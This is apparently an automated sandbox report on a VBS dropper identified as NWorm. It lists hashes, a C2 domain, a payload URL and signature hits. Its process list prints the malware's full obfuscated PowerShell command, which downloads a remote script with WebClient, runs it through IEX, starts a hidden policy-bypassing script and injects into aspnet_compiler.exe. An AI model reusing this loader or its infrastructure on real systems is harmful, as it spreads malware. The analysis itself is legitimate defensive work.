Overview

overview

10

Static

static

YBAXAKQXVYWIXQJDE.vbs

windows7_x64

10

YBAXAKQXVYWIXQJDE.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    08-03-2022 17:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    YBAXAKQXVYWIXQJDE.vbs

  • Size

    9KB

  • MD5

    40f92eb4b46a3430167477d11dec4c9e

  • SHA1

    515ad5cac3f5b9ed1e7a7e14d53a191a12193984

  • SHA256

    8c4477fd5129d549aabcbbcab1950965f7f0e0c934a60043dc7d27e57252868f

  • SHA512

    80de7c828aff509a8d0ddbee61f52ed1ade6a3b562f2aa51082eae7c1631fcdf58d375b94457261481b1a8bfc90033e275444d7f765dff7c0c6d99635408989e

Score
10/10
nwormdownloaderworm

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://transfer.sh/get/8J0O0I/Server435.txt

Extracted

Family

nworm

Version

v0.3.8

C2

nyanwmoney.duckdns.org:8891

Mutex

594274bc

Signatures

  • NWorm

    A TrickBot module used to propagate to vulnerable domain controllers.

    wormdownloadernworm
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\YBAXAKQXVYWIXQJDE.vbs"
    1⤵
      PID:1620
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_o)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_a)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_d)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),'67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-s67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-t67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-r67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-i67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-n67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-g67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-'.Replace('67&/!^)!+}&8<^+)3{2*)974\{+@-$$-)53(86+99+558]9*[@7]911\1#1&}8*9#-)[#3#\4{0/52[2&4&#7*%)46(}55$15]-',''),'%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%D%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%o%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%w%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%n%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%'.Replace('%8$5-<0-^+3-/*<1+=62}91=8^*-/!9}99@}4<-#]{<\1#)965=0<}\68+\8#*}6$9^_66]=/-6104=}]0({(/[$@7(#3^<!<}%',''));$HBB=('{2}{0}{1}' -f')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_b)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_C)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_l)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_i)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_e)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_n)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''),')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_Ne)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_t)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_.W)/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_'.Replace(')/8+&!9]]}039(3^<67)075^655$1$57]#*1{2#^&71!9@#1@8&4#\)${=^#7[[%_36]22=\{=446}8}-52{]1}<-482&10_!*_',''));$XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE=('{2}{0}{1}' -f'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<w-O-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<b-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<j-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<e-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<c-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<t $-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<BB-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<).$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<B(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<$H-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<x)-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''),'-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<I-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`E-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<`X(-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<Ne-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<'.Replace('-]/3181@7_\]4/3@4/1*^$20<*%_$-}2^)</\7(**(){%0%%15]@/8<![)4$-@\%}[@%<5%\@%<]{8[_41)0[%39__4935{7+5<',''));$HBBBBB = ($XSZAJXGNTVXKGOTPRJHWCIHRASQAUGABFPPDDYLDBUZUPFYQNSEEYDEHTDNZZCSFRCCYNJSVWVRFJIARKQAHKFABUCJNYFCWGTE -Join '')|I`E`X
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
        2⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4348
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          3⤵
            PID:4284

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1
        MD5

        96cbd4ee164e4feb93152e2ef2d0e229

        SHA1

        2f5963d3042b87d5e3684a8c1de74e3543aad81e

        SHA256

        2926650956ac94279c598ba4b761eac9fa34e49e8fe19580adf8c62fd2fac15a

        SHA512

        48df582b45e09a85e94d60502a1d5f68412ea1325d81ceb2256c5a142d09f4db57e2e6f746a55458276aa8d3d9af59ce66219489d9aa9b73c5dac2c8a7d27b5b

        Download Submit
      • memory/2484-130-0x00000172798C0000-0x00000172798E2000-memory.dmp
        Filesize

        136KB

        Download
      • memory/2484-132-0x0000017279920000-0x0000017279922000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2484-131-0x00007FFF7A220000-0x00007FFF7ACE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/2484-133-0x0000017279923000-0x0000017279925000-memory.dmp
        Filesize

        8KB

        Download
      • memory/2484-134-0x0000017279926000-0x0000017279928000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4284-142-0x0000000075000000-0x00000000757B0000-memory.dmp
        Filesize

        7.7MB

        Download
      • memory/4284-141-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

        Download
      • memory/4284-143-0x0000000005640000-0x0000000005641000-memory.dmp
        Filesize

        4KB

        Download
      • memory/4284-144-0x0000000005650000-0x00000000056EC000-memory.dmp
        Filesize

        624KB

        Download
      • memory/4284-145-0x0000000005CA0000-0x0000000006244000-memory.dmp
        Filesize

        5.6MB

        Download
      • memory/4284-146-0x0000000005760000-0x00000000057C6000-memory.dmp
        Filesize

        408KB

        Download
      • memory/4348-137-0x00007FFF7A220000-0x00007FFF7ACE1000-memory.dmp
        Filesize

        10.8MB

        Download
      • memory/4348-138-0x000002074B970000-0x000002074B972000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4348-140-0x000002074B976000-0x000002074B978000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4348-139-0x000002074B973000-0x000002074B975000-memory.dmp
        Filesize

        8KB

        Download
      • memory/4348-136-0x000002074D2F0000-0x000002074D30A000-memory.dmp
        Filesize

        104KB

        Download